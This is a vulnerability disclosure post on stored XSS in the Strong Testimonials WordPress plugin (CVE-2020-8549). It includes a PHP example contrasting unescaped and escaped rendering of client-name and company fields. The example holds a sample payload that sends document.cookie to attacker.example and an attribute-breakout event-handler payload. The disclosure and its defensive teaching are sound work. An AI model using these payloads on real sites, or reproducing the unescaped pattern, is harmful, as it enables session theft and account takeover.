
Stored XSS Vulnerability found in Strong Testimonials Plugin <= 2.40.0 - Update immediately

Updated on: March 29, 2020


While testing the popular WordPress testimonials plugin Strong Testimonials, I found multiple stored XSS vulnerabilities in it. All WordPress sites running Strong Testimonials version 2.40.0 or below are affected.

CVE ID: CVE-2020-8549
CWE ID: CWE-79

Summary

Strong Testimonials is a popular, easily customizable WordPress testimonial plugin with over 90,000 active installations. Because the payload is stored in the database and rendered to every visitor, an attacker can use these vulnerabilities to steal a victim's session cookies or login credentials, perform actions on the victim's behalf in the authenticated session, log the victim's keystrokes, inject spam content such as the Japanese keyword hack into the site, and more.

Vulnerability

In the client details section shown when adding or editing a testimonial, the custom[client_name] and custom[company_name] parameters were found to be vulnerable to stored cross-site scripting: the submitted values are saved as-is and later written into the page without output escaping.

When the testimonial is displayed on a page of the site, the XSS payload stored in either of the two parameters above is executed in the visitor's browser.

The payload in custom[client_name] is also executed on the All Testimonials page (/wp-admin/edit.php?post_type=wpm-testimonial), so any user who opens the testimonial list in wp-admin triggers it in an administrative context.
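To make the bug concrete, the following PHP is an added illustration written for this page; it is not the plugin's code and does not reproduce its templates. The function names (render_client_details_unsafe, render_client_details_safe), the CSS class names and the payload are assumptions. It shows the same two fields rendered once by string concatenation and once with WordPress's context-specific escaping helpers, using small stand-ins for esc_html()/esc_attr() so the file also runs under plain `php` outside WordPress.

```php
<?php
// Added example (not Strong Testimonials' code): the same stored values
// rendered without and with output escaping.
// Assumed names: render_client_details_unsafe, render_client_details_safe.

// Stand-ins so this runs outside WordPress. Inside WordPress the real
// esc_html()/esc_attr() exist and these definitions are skipped.
if (!function_exists('esc_html')) {
    function esc_html(string $s): string {
        return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    }
}
if (!function_exists('esc_attr')) {
    function esc_attr(string $s): string {
        return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    }
}

// Constructed request data, shaped like the custom[...] fields of the
// add/edit testimonial form. One payload targets an HTML text context,
// the other breaks out of a double-quoted attribute.
$custom = [
    'client_name'  => 'Alice <script>fetch("https://attacker.example/?c=" + document.cookie)</script>',
    'company_name' => 'ACME" onmouseover="alert(document.domain)',
];

// Vulnerable pattern: stored values concatenated straight into markup.
// Whatever was saved is handed to the browser as HTML.
function render_client_details_unsafe(array $custom): string {
    return '<div class="testimonial-client">' . $custom['client_name'] . '</div>'
         . '<div class="testimonial-company" title="' . $custom['company_name'] . '">'
         . $custom['company_name'] . '</div>';
}

// Hardened pattern: escape each value for the context it lands in
// (esc_html for element text, esc_attr inside an attribute value).
function render_client_details_safe(array $custom): string {
    return '<div class="testimonial-client">' . esc_html($custom['client_name']) . '</div>'
         . '<div class="testimonial-company" title="' . esc_attr($custom['company_name']) . '">'
         . esc_html($custom['company_name']) . '</div>';
}

echo "UNSAFE (script and event handler reach the browser):\n";
echo render_client_details_unsafe($custom), "\n\n";

echo "SAFE (angle brackets and quotes are encoded):\n";
echo render_client_details_safe($custom), "\n";
```

Run it with `php example.php`: the unsafe output contains a live `<script>` element and a `title="ACME" onmouseover="..."` attribute, while the safe output renders both payloads as inert text. Escaping at output time is the fix that matters, because it protects every place a stored value is printed, including the admin list column; sanitizing with sanitize_text_field() on save is worthwhile defense in depth but does not replace it. If a field is meant to carry limited HTML, wp_kses_post() is the appropriate filter instead of esc_html().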

Timeline

Vulnerability reported to the Strong Testimonials team on January 23, 2020.
Strong Testimonials version 2.40.1, containing the fix, was released on January 25, 2020.

Recommendation

It is highly recommended to update the plugin to version 2.40.1 or later. Because the payload is stored in the database, also review existing testimonials for injected markup in the client name and company name fields; updating the plugin stops the values from executing but does not remove them.


Jinson Varghese

Jinson Varghese Behanan is an Information Security Analyst at Astra. Passionate about Cybersecurity from a young age, Jinson completed his Bachelor's degree in Computer Security from Northumbria University. When he isn’t glued to a computer screen, he spends his time reading InfoSec materials, playing basketball, learning French and traveling. You can follow him on Medium or visit his Website for more stories about the various Security Audits he does and the crazy vulnerabilities he finds.